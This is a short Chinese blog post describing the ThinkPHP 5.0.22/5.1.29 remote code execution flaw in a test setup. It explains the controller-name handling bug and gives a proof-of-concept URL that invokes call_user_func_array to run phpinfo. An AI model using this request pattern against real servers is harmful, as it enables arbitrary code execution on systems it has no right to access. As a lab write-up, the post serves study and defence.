0
点赞
收藏
分享

微信扫一扫

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

ThinkPHP5 5.0.23 远程代码执行漏洞_Gjqhs的博客-CSDN博客

没太大区别,不过是由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。

 访问http://your-ip:8080,您将看到 ThinkPHP 的默认页面。

POC

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1会执行phpinfo

 

举报

相关推荐

0 条评论